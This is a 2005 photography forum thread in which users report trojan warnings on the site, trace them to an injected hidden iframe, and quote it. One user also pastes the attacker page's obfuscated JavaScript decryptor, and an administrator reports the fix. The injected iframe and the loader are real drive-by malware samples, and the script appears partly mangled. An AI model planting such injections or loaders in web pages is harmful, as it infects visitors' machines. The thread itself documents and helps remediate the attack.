Luminous Landscape Forum

Site & Board Matters => About This Site => Topic started by: Jack Flesher on November 20, 2005, 01:03:39 pm

Title: Trojan Horse Warning
Post by: Jack Flesher on November 20, 2005, 01:03:39 pm
FWIW -- My virus detector signals a trojan horse virus every time I log into the user forums...
Title: Trojan Horse Warning
Post by: schaubild on November 20, 2005, 01:11:02 pm
Same with me. The site tries to run a file named load.exe...  
Title: Trojan Horse Warning
Post by: francois on November 20, 2005, 01:18:59 pm
With Safari, the page closes as soon as it's loaded! Clearing the cache and cookies helps. This started about 20 minutes ago.

Edit: I've been able to load the initial forum page a few times without Safari closing the window.
Title: Trojan Horse Warning
Post by: Peter McLennan on November 20, 2005, 01:45:20 pm
Quote
With Safari, the page closes as soon as it's loaded! Clearing the cache and cookies helps. This started about 20 minutes ago.

Edit: I've been able to load the initial forum page a few times without Safari closing the window.
[a href=\"index.php?act=findpost&pid=51780\"][{POST_SNAPBACK}][/a]


This morning I'm getting a blocked popup warning when I go to "view new posts".  Never seen that here before.

Peter
Title: Trojan Horse Warning
Post by: Concorde-SST on November 20, 2005, 01:48:11 pm
Hello -

Im from Europe and I never had such problems
with this website.

Im using mac with safari (latest version, popup-blocker on).

Might be good to check your firewalls etc.?!

best,

Andreas.
Title: Trojan Horse Warning
Post by: Gary Brown on November 20, 2005, 01:49:57 pm
In the list of forums on the main page, the text for the first one (nature photography) has apparently been hacked so it's followed by an iframe tag with

     src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"

which apparently tries to load some trojan stuff.
Title: Trojan Horse Warning
Post by: Ben Rubinstein on November 20, 2005, 01:59:47 pm
Yup, I've been getting that, I've had my virus program block it but it still opens an empty window and tries to load the link Gary mentioned.
Title: Trojan Horse Warning
Post by: francois on November 20, 2005, 02:01:43 pm
Quote
Hello -

Im from Europe and I never had such problems
with this website.

Im using mac with safari (latest version, popup-blocker on).

Might be good to check your firewalls etc.?!

best,

Andreas.
[a href=\"index.php?act=findpost&pid=51784\"][{POST_SNAPBACK}][/a]

I'm also in Europe and using a Mac with Safari. As soon as the forum page loads, Safari closes the window. I tried to clear the caches & cookies and it helped somewhat but now it does it again.
     
Title: Trojan Horse Warning
Post by: francois on November 20, 2005, 02:03:53 pm
Quote
In the list of forums on the main page, the text for the first one (nature photography) has apparently been hacked so it's followed by an iframe tag with

     src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"

which apparently tries to load some trojan stuff.
[a href=\"index.php?act=findpost&pid=51785\"][{POST_SNAPBACK}][/a]


If I load the offending url, Safari (on the Mac) closes the window immediately. Using curl shows the hacked  source leading to the Russian address.

"Hacked" LL forum source:
<td class="row2"><b><a href="http://luminous-landscape.com/forum/index.php?amp;showforum=1">Landscape &amp; Nature Photography</a></b><br /><span class="forumdesc">Nature Photography ? technical and esthetic issues<iframe src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"<br /><br /><i></i></span></td>



"Russian" page source:
<script language=JavaScript>
function decrypt_p(x)
{var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,
t=Array(63,58,7,61,18,40,43,41,34,6,0,0,0,0,0,0,25,22,31,49,36,26,16,5,47,50,57,
45,14,33,15,8,12,2,20,27,53,30,42,9,0,1,29,0,0,0,0,48,0,54,60,59,28,10,35,55,62,3
9,3,21,52,4,38,24,13,17,23,37,51,19,44,11,32,46,56);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,;i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write}}decrypt_p("Gn7CXHdlXB3n@Ubnb6PlGIU3GIvTGUdIeSvtX2PMm4oneUbn@V5CXHdlXB3n@EKCrtdTqroImHv
_Fuv_XfJtmNpCASbTPrZlGE3T9f7xWtbCeEdIeSp_whvTQy@neEKCrtdTqHW")
</script>
Title: Trojan Horse Warning
Post by: mguertin on November 20, 2005, 02:33:27 pm
Thanks guys.

This has been fixed.  Someone found a way to trigger an unwanted password reset.

So no more trojan and I'm looking into how the password reset was triggered so they can't use this method to gain access any longer.

Mark

P.S. Thanks for the extra info in this thread, made it much easier to track down as I'm also on Safari on a Mac